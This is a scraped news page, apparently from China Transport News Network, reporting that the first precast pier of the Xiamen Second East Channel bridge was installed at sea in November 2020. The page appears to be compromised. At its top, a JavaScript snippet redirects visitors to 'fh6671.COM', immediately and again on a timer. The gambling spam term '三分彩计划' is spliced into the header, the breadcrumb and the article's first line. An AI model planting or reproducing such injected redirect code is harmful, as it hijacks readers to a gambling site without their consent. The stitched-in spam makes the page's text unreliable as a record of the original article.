function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

三分彩计划

交通运输部主管  中国交通报社主办

中国交通新闻网三分彩计划  > 图片新闻

厦门第二东通道桥梁工程进入海上组装阶段

2020-11-18 10:56:44 来源:中国交通新闻网 作者: 记者 龚仁智 文 于富亮 图

image.png

三分彩计划11月16日,随着中交一航局起重船“一航津泰”轮缓缓落钩,福建厦门第二东通道首件预制墩台完成与钢管复合桩基的对接安装,标志着厦门第二东通道桥梁工程进入海上组装阶段。 据悉,厦门第二东通道工程为福建省“六纵十横”规划高速公路路网中“一纵”,是厦门市进出岛交通网络规划中重要的跨海通道之一。 该工程跨海段桥梁遵循“工厂化、大型化、标准化、装配化”的建设理念,全部采用“分节预制墩台+全孔厂制钢箱梁”的工厂化预制、机械化拼装方式施工。 此次海上安装的H20墩台由三节组成,分别为下节墩台、中节墩身、顶节墩帽,总高度40.8米,其中下节墩台含厚承台,高22米、重约2200吨。


中国交通新闻网版权及免责声明:
1、凡本网注明“来源:中国交通报”、“来源:中国交通新闻网” 的所有作品,版权均属于中国交通新闻网,未经本网授权,任何单位及个人不得转载、摘编或以其他方式使用上述作品。已经本网授权使用作品的,应在授权范围 内使用,并注明“来源:中国交通新闻网”。违反上述声明者,本网将追究其相关法律责任。
2、凡本网注明 “来源:XXX(非中国交通新闻网)” 的作品,均转载自其他媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
3、如因作品内容、版权和其他问题需要同本网联系的,请在30日内进行。